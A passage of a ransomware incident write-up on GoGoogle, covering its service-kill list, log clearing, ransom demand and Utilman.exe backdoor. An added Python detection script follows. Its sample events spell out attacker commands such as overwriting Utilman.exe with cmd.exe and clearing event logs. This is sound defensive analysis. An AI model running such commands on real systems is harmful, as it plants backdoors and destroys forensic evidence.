    Looking at the binary itself, we can see that much of the code is written using Go and the compiler/creator used the name demon777. Before encrypting files, the ransomware uses many Windows utilities such as WMI, taskkill, WEVTUTIL, and net.exe to kill processes and remove logs from the system.
    Example of logs being cleared. Example of processes being killed. Here is the long list of services killed before the ransomware encryption process starts:
      AcronisActiveProtectionService,AcronisAgent,AcronisMonitoringService,AcronisZmqGw,AcrSch2Svc,AdobeActiveFileMonitor10.0,AdobeARMservice,AdobeFlashPlayerUpdateSvc,AdobeUpdateService,ADWS,AGMService,AGSService,AmazonSSMAgent,AMPPALR3,AMS,AnyDesk,Apple,ARSM,ASM,aspnet_state,Atenet.Service,Backupper,BASupportExpressSrvcUpdater_LOGICnow,BASupportExpressSrvcUpdater_N_Central,BASupportExpressStandaloneService_LOGICnow,BASupportExpressStandaloneService_N_Central,BayanService,bkserv,BTHSSecurityMgr,btwdins,CcmExec,Check_MK_Agent,CIMnotify,Cissesrv,ClickToRunSvc,CodeMeter.exe,CpqNicMgmt,CpqRcmc3,cpqvcagent,CqMgHost,CqMgServ,CqMgStor,cramsrv,crserv,crsyslog,dbex,DESIGO,discagt,disvc,dlhm,DPMClientService,DpmCPWrapperService,DPMRA,DriveLock,dwmrcs,Dyn,Ec2Config,EcuRemote,EFI,ekrn,ekrnEpfw,EpsonBidirectionalService,EpsonScanSvc,FileOpenManagerSvc,firebirdguardiandefaultinstance,FirebirdGuardiansgsSFBServer,FirebirdServersgsSFBServer,FlowExport,FontCache3.0.0.0,fvstermiser,HealthService,hist32,hMailServer,HostControllerService,HPSIService,HPWMISTOR,IAStorDataMgrSvc,ibmiasrw,IISADMIN,iPod,jhi_service,LavasoftTcpService,LicSvrM,MacriumService,Microsoft.Crm.VssWriterService.exe,MMAExtensionHeartbeatService,MMS,MSComplianceAudit,MSCRMAsyncService,MSCRMAsyncService$maintenance,MSCRMMonitoringService,MSCRMSandboxService,MSCRMUnzipService,MSDTC,MsDtsServer100,MSExchangeAB,MSExchangeADTopology,MSExchangeAntispamUpdate,MSExchangeCompliance,MSExchangeDagMgmt,MSExchangeDelivery,MSExchangeDiagnostics,MSExchangeEdgeSync,MSExchangeFastSearch,MSExchangeFBA,MSExchangeFDS,MSExchangeFrontEndTransport,MSExchangeHM,MSExchangeHMRecovery,MSExchangeImap4,MSExchangeIMAP4BE,MSExchangeIS,MSExchangeMailboxAssistants,MSExchangeMailboxReplication,MSExchangeMailSubmission,MSExchangeMonitoring,MSExchangeNotificationsBroker,MSExchangePop3,MSExchangePOP3BE,MSExchangeProtectedServiceHost,MSExchangeRepl,MSExchangeRPC,MSExchangeSA,MSExchangeSearch,MSExchangeServiceHost,MSExchangeSubmission,MSExchangeThrottling,MSExchangeTransport,MSExchangeTransportLogSearch,MSExchangeUM,MSExchangeUMCR,msftesql,Exchange,MSMQ,MSOLAP$SQL,MSSQL$CRMVIEW,MSSQL$CRMVIEW2,MSSQL$ISARS,MSSQL$MSFW,MSSQLFDLauncher,MSSQLLaunchpad$SQLEXPRESS,MSSQLSERVER,MSSQLServerADHelper100,MSSQLServerOLAPService,MySQL,MySQL55,NetPipeActivator,NetTcpActivator,NetTcpPortSharing,NGCLIENT,ntfsvc,nvsvc,NVWMI,OpenVPNAccessClient,OracleMTSRecoveryService,OracleOraDb11g_home1ClrAgent,OracleOraDb11g_home1TNSListener,OracleServiceINFAORCL,ose,osppsvc,PCoIPAgent,PCoIPArbiterService,PCoIPPrintingSvc,PolicyAgent,ProLiantMonitor,QBCFMonitorService,QBFCService,QBPOSDBServiceV12,QBVSS,QuickBooksDB1,QuickBooksDB10,QuickBooksDB11,QuickBooksDB12,QuickBooksDB13,QuickBooksDB14,QuickBooksDB15,QuickBooksDB16,QuickBooksDB17,QuickBooksDB18,QuickBooksDB19,QuickBooksDB2,QuickBooksDB20,QuickBooksDB21,QuickBooksDB22,QuickBooksDB23,QuickBooksDB24,QuickBooksDB25,QuickBooksDB3,QuickBooksDB4,QuickBooksDB5,QuickBooksDB6,QuickBooksDB7,QuickBooksDB8,QuickBooksDB9,RdAgent,Realtek11nCU,ReportServer,ReportServer$ISARS,ReportServer$SQL,RtkAudioService,SageEvolutionEcommService,SDRSVC,SearchExchangeTracing,SentinelKeysServer,SentinelProtectionServer,SentinelSecurityRuntime,Service,ShadowProtectSvc,ShutdownMon,SkyLightWorkspaceConfigService,SNMPTRAP,SoftwareProxyJavaChecker,SolarWindsAgent64,SPAdminV4,Spooler,sppsvc,SPSearch4,SPTimerV4,SPTraceV4,SPUserCodeV4,SPWriterV4,SQLAgent$ISARS,SQLAgent$MSFW,SQLBrowser,SQLSERVERAGENT,SQLServerReportingServices,SQLTELEMETRY$SQLEXPRESS,SQLWriter,sshd,Stxhd.HostAgents.HAService,swprv,sysdown,SysMgmtHp,TdmService,TeamViewer,TeamViewer1,TeamViewer10,TeamViewer11,TeamViewer12,TeamViewer2,TeamViewer3,TeamViewer4,TeamViewer5,TeamViewer6,TeamViewer7,TeamViewer8,TeamViewer9,Tomcat8Testing,Tomcat9,tvnserver,UltraViewService,UNS,uvnc_service,vcsFPService,VeeamCatalogSvc,VeeamCloudSvc,VeeamDeploySvc,VeeamMountSvc,VeeamNFSSvc,VeeamTransportSvc,VGAuthService,VisualSVNServer,VMAuthdService,vmicheartbeat,vmickvpexchange,vmicrdv,vmicshutdown,vmictimesync,vmicvss,VMnetDHCP,VMTools,VMUSBArbService,VMware,VMwareHostd,VSS,wbengine,WindowsAzureGuestAgent,WindowsAzureNetAgentSvc,WindowsAzureTelemetryService,wlidsvc,WMPNetworkSvc,Wrmserv,wsbexchange,WSearch

    The ransom note left behind left an ID and used an email address as outreach to the attackers using the qq.com service. Contact was made with the ransomer and they asked for 2 BTC (13,400 USD at time of writing). It is possible that this was per ransomed device, but the lab was reset with only a single ransom note collected before indicators were removed. While leaving the ransom note, it appears the actors were planting the capability to potentially return in the future, should the systems not receive a full wipe, using a Utilman.exe backdoor to allow system cmd access at the login screen.

    Summary
    These attackers moved fairly fast, as they were able to go from zero to installing ransomware on 5+ machines in just over an hour. There were a ton of artifacts dropped by this attacker, which were mostly NirSoft tools, but the attackers did have a few of their own scripts. The attackers ran a few commands that may be easy to detect, such as enabling network discovery, replacing Utilman with cmd, clearing logs and killing a bunch of services such as TeamViewer1. We found some interesting strings in the bild binary which could make for a good Yara rule. If you have any further questions, please feel free to reach out to us via the Contact Us page.

    IOCs
    In the future IOCs will be posted to MISP, but right now you can find them on pastebin.
    Source: https://thedfirreport.com/2020/04/04/gogoogle-ransomware/
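Editor's added example (not part of Nytro's post or of The DFIR Report's write-up): the Summary calls out the commands that are easy to detect (enabling network discovery, replacing Utilman with cmd, clearing logs with wevtutil, killing processes and services with taskkill/WMI/net.exe). This Python script classifies process command lines against those behaviours and flags a host when several distinct ones cluster inside a short window, which is what the report's "zero to ransomware in just over an hour" timeline looks like in telemetry. The events below are constructed, not taken from the report; the `netsh` form used to enable network discovery and the `copy cmd.exe ... Utilman.exe` form are this example's assumptions about how those actions appear on a command line.

```python
import re
from collections import defaultdict
from datetime import datetime

# Added example (editor's, not from the report): classify process command
# lines against the behaviours the report names, then flag hosts where
# several distinct behaviours cluster in a short window.
RULES = [
    ("log clearing",
     re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
    ("process kill",
     re.compile(r"\btaskkill(\.exe)?\b.*?/im\s+\S+"
                r"|\bwmic(\.exe)?\s+process\b.*\b(terminate|delete)\b", re.I)),
    ("service stop",
     re.compile(r'\bnet1?(\.exe)?\s+stop\s+"?[^\s"]+', re.I)),
    ("utilman backdoor",          # assumed form: copying cmd.exe over Utilman
     re.compile(r"utilman\.exe", re.I)),
    ("network discovery enable",  # assumed form: netsh firewall rule group
     re.compile(r"network discovery.*\benable=yes\b", re.I)),
]


def classify(cmd: str) -> list:
    """Names of every rule that matches the command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmd)]


def triage(events: list, window_minutes: int = 60, threshold: int = 3) -> dict:
    """events: dicts with ISO 'time', 'host', 'user', 'cmd'. Returns the
    per-host rule hits and the hosts on which at least `threshold` distinct
    behaviours occurred within `window_minutes` of one another."""
    hits = defaultdict(list)
    for ev in events:
        for tactic in classify(ev["cmd"]):
            hits[ev["host"]].append(
                (datetime.fromisoformat(ev["time"]), tactic, ev["cmd"]))
    flagged = {}
    for host, rows in hits.items():
        rows.sort()
        for i, (t0, _, _) in enumerate(rows):   # sliding window from each hit
            tactics = {tac for t, tac, _ in rows[i:]
                       if (t - t0).total_seconds() <= window_minutes * 60}
            if len(tactics) >= threshold:
                flagged[host] = sorted(tactics)
                break
    return {"hits": dict(hits), "flagged": flagged}


# Constructed process-creation events (not from the report). WS07 shows
# ordinary admin activity; DC01 shows the pre-encryption burst.
EVENTS = [
    {"time": "2020-04-04T09:58:02", "host": "WS07", "user": "jdoe",
     "cmd": r"net use Z: \\fs01\share"},
    {"time": "2020-04-04T10:01:10", "host": "DC01", "user": "Administrator",
     "cmd": 'netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes'},
    {"time": "2020-04-04T10:03:41", "host": "DC01", "user": "Administrator",
     "cmd": r"copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe"},
    {"time": "2020-04-04T10:05:12", "host": "DC01", "user": "Administrator",
     "cmd": "wevtutil.exe cl Security"},
    {"time": "2020-04-04T10:05:13", "host": "DC01", "user": "Administrator",
     "cmd": "wevtutil.exe cl System"},
    {"time": "2020-04-04T10:05:20", "host": "DC01", "user": "Administrator",
     "cmd": "net stop TeamViewer1 /y"},
    {"time": "2020-04-04T10:05:21", "host": "DC01", "user": "Administrator",
     "cmd": "taskkill /f /im sqlservr.exe"},
    {"time": "2020-04-04T14:30:00", "host": "WS07", "user": "helpdesk",
     "cmd": "net stop Spooler"},
]

if __name__ == "__main__":
    result = triage(EVENTS)
    for host, rows in result["hits"].items():
        for when, tactic, cmd in rows:
            print(f"{when:%H:%M:%S} {host:5} {tactic:26} {cmd}")
    print("flagged:", result["flagged"])
```

A single `net stop` from the helpdesk is a hit but not a flag; the clustering threshold is what separates routine administration from the report's pattern of clearing logs, stopping backup and security services and planting the Utilman backdoor on one host within minutes.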